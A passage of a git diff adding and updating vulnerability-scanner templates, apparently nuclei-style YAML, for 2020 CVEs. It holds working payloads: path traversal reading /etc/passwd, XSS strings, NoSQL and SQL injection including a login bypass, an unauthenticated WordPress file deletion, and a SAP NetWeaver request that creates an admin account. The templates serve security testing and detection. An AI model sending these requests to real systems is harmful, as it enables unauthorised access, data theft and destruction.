+ - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml
new file mode 100644
index 0000000000..e772c16eec
--- /dev/null
+++ b/cves/2020/CVE-2020-35774.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-35774
+
+info:
+ name: Twitter Server XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774
+ tags: cve,cve2020,xss,twitter-server
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml
new file mode 100644
index 0000000000..141cb2910f
--- /dev/null
+++ b/cves/2020/CVE-2020-3580.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-3580
+
+info:
+ name: Cisco ASA XSS
+ author: pikpikcu
+ severity: medium
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
+ - https://twitter.com/ptswarm/status/1408050644460650502
+ description: |
+ Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
+ tags: cve,cve2020,xss,cisco
+
+requests:
+ - raw:
+ - |
+ POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 44
+
+ SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml
new file mode 100644
index 0000000000..35f6119a3c
--- /dev/null
+++ b/cves/2020/CVE-2020-35846.yaml
@@ -0,0 +1,39 @@
+id: CVE-2020-35846
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.
+ The $eq operator matches documents where the value of a field equals the specified value.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/check"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "auth": {
+ "user": {
+ "$eq": "admin"
+ },
+ "password": [
+ 0
+ ]
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "password_verify() expects parameter"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml
new file mode 100644
index 0000000000..2226a19d6f
--- /dev/null
+++ b/cves/2020/CVE-2020-35847.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-35847
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
+ author: dwisiswant0
+ severity: critical
+ description: |
+ resetpassword method of the Auth controller,
+ which is responsible for changing the user password using the reset token.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/requestreset"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "user": {
+ "$func": "var_dump"
+ }
+ }
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml
new file mode 100644
index 0000000000..9e693b11c7
--- /dev/null
+++ b/cves/2020/CVE-2020-35848.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-35848
+
+info:
+ name: Cockpit prior to 0.12.0 NoSQL injection in /auth/newpassword
+ author: dwisiswant0
+ severity: critical
+ description: |
+ newpassword method of the Auth controller,
+ which is responsible for displaying the user password reset form.
+ reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+ tags: cve,cve2020,nosqli,sqli
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/auth/newpassword"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "token": {
+ "$func": "var_dump"
+ }
+ }
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml
new file mode 100644
index 0000000000..8f6e44259c
--- /dev/null
+++ b/cves/2020/CVE-2020-35951.yaml
@@ -0,0 +1,81 @@
+id: CVE-2020-35951
+
+info:
+ name: Wordpress Quiz and Survey Master Arbitrary File Deletion
+ author: princechaddha
+ severity: critical
+ description: |
+ An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
+ reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
+ tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+ Connection: close
+
+ - |
+ GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+ Connection: close
+
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 269
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
+ Accept: */*
+ Accept-Language: en-US,en;q=0.9
+ Connection: close
+
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92
+ Content-Disposition: form-data; name="action"
+
+ qsm_remove_file_fd_question
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92
+ Content-Disposition: form-data; name="file_url"
+
+ {{fullpath}}wp-content/plugins/quiz-master-next/README.md
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92--
+
+ - |
+ GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+ Connection: close
+
+ extractors:
+ - type: regex
+ name: fullpath
+ internal: true
+ part: body
+ group: 1
+ regex:
+ - "not found in ([/a-z_]+)wp"
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '{"type":"success","message":"File removed successfully"}'
+ part: body
+
+ - type: dsl
+ dsl:
+ - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
new file mode 100644
index 0000000000..142c4a081a
--- /dev/null
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-36112
+
+info:
+ name: CSE Bookstore 1.0 SQL Injection
+ author: geeknik
+ description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
+ reference: |
+ - https://www.exploit-db.com/exploits/49314
+ - https://www.tenable.com/cve/CVE-2020-36112
+ severity: critical
+ tags: cve,cve2020,sqli,cse
+
+requests:
+ - raw:
+ - |
+ GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ DNT: 1
+ Connection: close
+ Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+ Upgrade-Insecure-Requests: 1
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "get book price failed! You have an error in your SQL syntax"
+ - "Can't retrieve data You have an error in your SQL syntax"
+ condition: or
diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml
new file mode 100644
index 0000000000..d211f4a8ba
--- /dev/null
+++ b/cves/2020/CVE-2020-36289.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-36289
+
+info:
+ name: Atlassian Jira Unauth User Enumeration
+ author: dhiyaneshDk
+ severity: medium
+ description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
+ tags: cve,cve2020,jira,atlassian
+ reference: |
+ - https://twitter.com/ptswarm/status/1402644004781633540
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
+ - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'rel=\"admin\"'
+
+ - type: word
+ words:
+ - 'application/json'
+ part: header
diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml
index eeb639dd4e..d4f6d47a22 100644
--- a/cves/2020/CVE-2020-4463.yaml
+++ b/cves/2020/CVE-2020-4463.yaml
@@ -10,7 +10,7 @@ info:
A remote attacker could exploit this vulnerability to expose
sensitive information or consume memory resources.
- References:
+ references: |
- https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
- https://github.com/Ibonok/CVE-2020-4463
tags: cve,cve2020,ibm,xxe
diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml
index 040d578f25..90ae483682 100644
--- a/cves/2020/CVE-2020-5284.yaml
+++ b/cves/2020/CVE-2020-5284.yaml
@@ -2,9 +2,13 @@ id: CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
- author: Harsh & Rahul & dwisiswant0
+ author: rootxharsh,iamnoooob,dwisiswant0
severity: medium
- tags: cve,cve2020,nextjs,traversal
+ description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
+ tags: cve,cve2020,nextjs,lfi
+ reference:
+ https://github.com/zeit/next.js/releases/tag/v9.3.2
+ https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml
new file mode 100644
index 0000000000..55fcfc1b84
--- /dev/null
+++ b/cves/2020/CVE-2020-5307.yaml
@@ -0,0 +1,34 @@
+id: CVE-2020-5307
+
+info:
+ name: Dairy Farm Shop Management System - SQL Injection
+ author: gy741
+ description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
+ reference: |
+ - https://cinzinga.com/CVE-2020-5307-5308/
+ severity: critical
+ tags: cve,cve2020,sqli
+
+requests:
+ - raw:
+ - |
+ POST /dfsms/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Connection: close
+ Content-Length: 66
+
+ username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "add-category.php"
+
+ - type: status
+ status:
+ - 302
diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml
index 8bce0cb0a2..a103e34d12 100644
--- a/cves/2020/CVE-2020-5405.yaml
+++ b/cves/2020/CVE-2020-5405.yaml
@@ -2,10 +2,11 @@ id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
- author: Harsh Bothra
+ author: harshbothra_
severity: high
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-5405
- tags: cve,cve2020,traversal,springcloud
+ description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
+ reference: https://pivotal.io/security/cve-2020-5405
+ tags: cve,cve2020,lfi,springcloud
requests:
- method: GET
@@ -18,5 +19,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml
index 4fc88d4520..773e721bae 100644
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@@ -4,7 +4,9 @@ info:
name: Directory Traversal in Spring Cloud Config Server
author: mavericknerd
severity: high
- tags: cve,cve2020,traversal,springcloud
+ description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
+ reference: https://tanzu.vmware.com/security/cve-2020-5410
+ tags: cve,cve2020,lfi,springcloud
requests:
- method: GET
@@ -17,5 +19,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml
index 2da8116c14..a0b1eac7af 100644
--- a/cves/2020/CVE-2020-5412.yaml
+++ b/cves/2020/CVE-2020-5412.yaml
@@ -6,6 +6,7 @@ info:
severity: medium
description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
tags: cve,cve2020,ssrf,springcloud
+ reference: https://tanzu.vmware.com/security/cve-2020-5412
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index 2813074c89..e8b8df0a28 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -5,8 +5,8 @@ info:
author: dwisiswant0
severity: high
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-5776
- tags: cve,cve2020,magmi
+ reference: https://www.tenable.com/security/research/tra-2020-51
+ tags: cve,cve2020,magmi,magento
# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
# in the event that a CSRF is leveraged against an existing admin session for MAGMI.
diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml
index 188bf37df3..2781b85b50 100644
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@@ -4,8 +4,9 @@ info:
name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23
author: dwisiswant0
severity: high
- description: "MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure."
- tags: cve,cve2020,magmi
+ description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
+ reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
+ tags: cve,cve2020,magmi,magento
# Response code 503 indicates a potential successful "Too many connections" error
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml
index 966266febe..fd2fcf9241 100644
--- a/cves/2020/CVE-2020-5847.yaml
+++ b/cves/2020/CVE-2020-5847.yaml
@@ -3,6 +3,7 @@ info:
name: UnRaid Remote Code Execution
author: madrobot
severity: high
+ description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code.
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: cve,cve2020,rce
diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml
index 2cd2d99f81..cfc759516e 100644
--- a/cves/2020/CVE-2020-5902.yaml
+++ b/cves/2020/CVE-2020-5902.yaml
@@ -2,8 +2,21 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
- author: madrobot & dwisiswant0 & ringo
+ author: madrobot,dwisiswant0,ringo
severity: high
+ description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
+ reference: |
+ - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
+ - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
+ - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
+ - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html
+ - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html
+ - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/
+ - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
+ - https://support.f5.com/csp/article/K52145254
+ - https://swarm.ptsecurity.com/rce-in-f5-big-ip/
+ - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
+ - https://www.kb.cert.org/vuls/id/290915
tags: cve,cve2020,bigip,rce
requests:
@@ -20,7 +33,7 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml
new file mode 100644
index 0000000000..1e99f11860
--- /dev/null
+++ b/cves/2020/CVE-2020-6171.yaml
@@ -0,0 +1,31 @@
+id: CVE 2020-6171
+
+info:
+ name: CLink Office v2 XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-6171
+ tags: cve,cve2020,xss,clink-office
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml
new file mode 100644
index 0000000000..d36d906517
--- /dev/null
+++ b/cves/2020/CVE-2020-6207.yaml
@@ -0,0 +1,48 @@
+id: CVE-2020-6207
+
+info:
+ name: SAP Solution Manager remote unauthorized OS commands execution
+ author: _generic_human_
+ severity: critical
+ tags: cve,cve2020,sap,solman,rce
+ description: |
+ SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
+ reference:
+ - https://launchpad.support.sap.com/#/notes/2890213
+ - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305
+ - https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
+ - https://github.com/chipik/SAP_EEM_CVE-2020-6207
+ - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/
+ - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/
+
+requests:
+ - raw:
+ - |
+ POST /EemAdminService/EemAdmin HTTP/1.1
+ Host: {{Hostname}}
+ SOAPAction: ""
+ Content-Type: text/xml; charset=UTF-8
+ Connection: close
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ":Envelope"
+ - ":Body"
+ - ":getAllAgentInfoResponse"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/xml"
+ - "SAP NetWeaver Application Server"
+ part: header
+ condition: and
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 73bcf635e4..46077c6fbd 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -1,38 +1,48 @@
id: CVE-2020-6287
info:
- name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+ name: SAP NetWeaver - Remote Admin addition
author: dwisiswant0
severity: critical
tags: cve,cve2020,sap
-
- # Affected Versions: 7.30, 7.31, 7.40, 7.50
-
- # p.s:
- # > Don't forget to change the default credentials
- # > to create new admin in associated file:
- # > `payloads/CVE-2020-6287.xml`
-
- # Ref:
- # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
+ description: |
+ SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.
+ reference:
+ - https://launchpad.support.sap.com/#/notes/2934135
+ - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
+ - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+ - https://github.com/chipik/SAP_RECON
requests:
- - payloads:
- data: helpers/payloads/CVE-2020-6287.xml
- raw:
+ - raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
- sap.com/tc~lm~config~content content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc {{base64('§data§')}} userDetails
+ sap.com/tc~lm~config~content content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc
+ CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
+ userDetails
+
+ # userName - sapRpoc6351
+ # password - Secure!PwD8890
+
matchers-condition: and
matchers:
- type: word
words:
- - "urn:CTCWebServiceSi"
+ - "CTCWebServiceSi"
+ - "SOAP-ENV"
part: body
+ condition: and
+
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+ - type: word
+ words:
+ - "text/xml"
+ - "SAP NetWeaver Application Server"
+ part: header
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
new file mode 100644
index 0000000000..a0bb988cd8
--- /dev/null
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-6308
+
+info:
+ name: Unauthenticated Blind SSRF in SAP
